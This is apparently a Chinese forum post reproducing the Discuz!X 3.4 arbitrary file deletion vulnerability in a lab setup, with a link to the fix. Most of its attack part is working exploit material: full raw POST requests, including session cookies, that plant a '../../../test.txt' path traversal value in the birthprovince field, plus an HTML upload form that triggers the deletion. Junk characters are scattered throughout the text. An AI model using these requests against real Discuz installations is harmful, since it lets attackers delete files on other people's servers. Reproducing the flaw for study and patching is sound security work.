Discuz!X 3.4 任意文件删除漏洞复现

fudyou

& T' X; C$ h: \+ V) l/ k3 a% a
3 B8 o5 ?! y& h前言：9月29日，Discuz修复了一个前台任意文件删除的漏洞，相似的漏洞曾在2014年被提交给wooyun和discuz官方，但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复，但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。
影响版本：Discuz < =3.4 环境
: B# t/ i$ ]+ |4 ?
. _$ }/ ?# U/ u复现过程：首先在discuz目录下新建一个test.txt文件，到时候删除用。
! D- @  [  p7 S% M* E新建test.txt
. w$ ^* f$ Q3 o. P3 N7 T* |访问：http://192.168.220.131/home.php?mod=spacecp，然查审查元素，查看formhash的值，然后复制。
' e! n/ G# n4 e- H( m, u8 q

查看formhash
利用burp抓包，获取cookie
& y0 [/ u. w( E" T1 K! u0 y" Q

- [  @; Q, q0 n' w. Q( Q
8 E4 G8 Q& h( \3 f. W6 J: `  p

抓取cookie

发送下面数据包：修改cookie，formhash,还有删除的文件
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
8 H. n  x. \/ i! |; M4 cContent-Length: 367
Cache-Control: max-age=0
: S. I! t- ~$ @# T$ i8 bUpgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
& Y9 ?3 r1 T. aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
& F- \& J$ y% s! `* c$ fAccept-Language: zh-CN,zh;q=0.8,en;q=0.6
0 o! P4 x# P1 _+ R: @Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close
3 F' }: C* c9 O! ]------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"
  v+ G- }# k  q( k2 F# I& J# l84a7f376
, h/ ^: {# d8 f------WebKitFormBoundaryPFvXyxL45f34L12s
- R2 ?  W5 p3 I  P* N; V1 V% eContent-Disposition: form-data; name="birthprovince"
( h) z+ i' A1 h' }0 T  j' }../../../test.txt
0 Y: d9 H  G8 F. Z$ i8 ]4 d- q------WebKitFormBoundaryPFvXyxL45f34L12s
! B1 R+ ?- j% L" v8 q, ]Content-Disposition: form-data; name="profilesubmit"
1
3 P' V9 }. o% H9 ?------WebKitFormBoundaryPFvXyxL45f34L12s--
; e9 [6 E1 u9 H/ k) e发送删除的数据包
刷新页面，查看出生地就会显示成下图所示的状态：
  h% N8 G% W% B' t! ~% T2 |3 {: X数据成功写入
1 `: A% T* L, K; ]" M. I

说明数据已经进入数据库：
+ P, F: @& Y! e/ t' L! o+ N然后，新建一个upload.html，代码如下，将其中的ip改成discuz的域名，[form-hash]改成你的formhash：
2 n9 F' X/ J2 B0 D/ W  l9 a<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">
% G$ K3 W5 f- |4 O- S<input type="file"name="birthprovince" id="file" />
<input type="text"name="formhash" value="84a7f376"/></p>
0 E4 `8 A6 }6 ]( u3 j6 c<input type="text"name="profilesubmit" value="1"/></p>
1 f! A- k6 X& @2 j<input type="submit"value="Submit" />
7 C$ r. O9 T# D! J9 ?6 j. C</from>


1 G4 n. e% e2 j. |
, F, n9 [6 u9 O, N+ k) |: ]
8 ?$ L0 G% G( W2 A) r
或者直接构建数据包：
. f9 m; g' g6 h8 Y& d# RPOST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
6 o5 f0 M* U+ w3 YConnection: close
5 X% S; x: j* _6 F' A% l% ICookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
: [# u1 |  u2 P5 N8 J$ YUpgrade-Insecure-Requests: 1
-----------------------------123821742118716
$ b( y8 O8 Y; O! l* U9 rContent-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg
" `7 ?* @! O6 u& P: S  ^5 m: azerba（这里写啥都可以）
-----------------------------123821742118716--

) y3 _2 g! b, ?( B) }# c2 r; }3 n
8 J( O7 h9 y! v7 v6 F5 j
" n- w, x; I6 k: r



  x5 i+ x8 W: x9 K: z5 G* I
1 @+ d+ Y- x9 L3 g+ ^% V7 e
! K: U* j; A( ]  q0 K0 Z. Z: _
* \9 d4 ?0 J: S4 p7 b
进去discuz看看，可以看到，test.txt文件已经被删除了。
* q- h- n0 p( }/ ?
4 O9 q/ p3 Y4 ^

" `. l* C2 l4 U- D0 R, o

& k5 M1 V3 ]  ^2 v6 S修复建议：https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
2 E& M. r8 f6 s- C% @2 E编辑upload/source/include/spacecp/spacecp_profile.php文件，删除和unlink相关代码。
! B3 s' w: y5 H1 @, [






( W8 y# j- u0 r! _0 q9 E3 ?
% d/ h# @9 L9 z* a: Y
3 y/ u$ ~  k% W' F1 V* B